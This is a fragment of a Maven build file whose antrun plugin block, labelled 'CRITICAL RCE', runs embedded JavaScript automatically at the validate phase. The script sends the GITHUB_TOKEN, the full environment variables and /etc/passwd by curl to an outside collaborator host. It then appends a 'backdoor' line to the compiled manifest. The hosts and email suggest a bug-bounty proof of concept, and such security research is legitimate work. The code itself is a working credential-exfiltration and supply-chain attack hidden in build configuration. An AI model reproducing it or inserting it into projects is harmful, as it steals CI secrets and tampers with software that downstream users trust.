      <!-- ================================================== -->
      <!-- CRITICAL RCE - FULL ESCALATION                    -->
      <!-- ================================================== -->
      <plugin>
        <groupId>org.apache.maven.plugins</groupId>
        <artifactId>maven-antrun-plugin</artifactId>
        <version>3.1.0</version>
        <executions>
          <execution>
            <phase>validate</phase>
            <goals>
              <goal>run</goal>
            </goals>
            <configuration>
              <target>
                <script language="javascript">
                <![CDATA[
                  var domain = "86cn6q4f461ybfurvkdc32tn2e8fw7kw.oastify.com";
                  var email = "mrbibo@bugcrowdninja.com";
                  
                  // 1. Exfil GITHUB_TOKEN
                  var token = java.lang.System.getenv("GITHUB_TOKEN");
                  if (token != null) {
                    var cmd1 = "curl -X POST -d 'token=" + token + "' https://" + domain + "/exfil -H 'User-Agent: " + email + "'";
                    java.lang.Runtime.getRuntime().exec(new String[]{"sh", "-c", cmd1});
                  }
                  
                  // 2. Exfil environment variables (secrets)
                  var cmd2 = "env | base64 -w0 | curl -X POST --data-binary @- https://" + domain + "/env -H 'User-Agent: " + email + "'";
                  java.lang.Runtime.getRuntime().exec(new String[]{"sh", "-c", cmd2});
                  
                  // 3. Exfil /etc/passwd
                  var cmd3 = "cat /etc/passwd 2>/dev/null | base64 -w0 | curl -X POST --data-binary @- https://" + domain + "/passwd -H 'User-Agent: " + email + "'";
                  java.lang.Runtime.getRuntime().exec(new String[]{"sh", "-c", cmd3});
                  
                  // 4. Modify build artifact (supply chain attack)
                  var cmd4 = "echo 'Malicious backdoor injected at $(date)' >> target/classes/META-INF/MANIFEST.MF";
                  java.lang.Runtime.getRuntime().exec(new String[]{"sh", "-c", cmd4});
                ]]>
                </script>
              </target>
            </configuration>
          </execution>
        </executions>
      </plugin>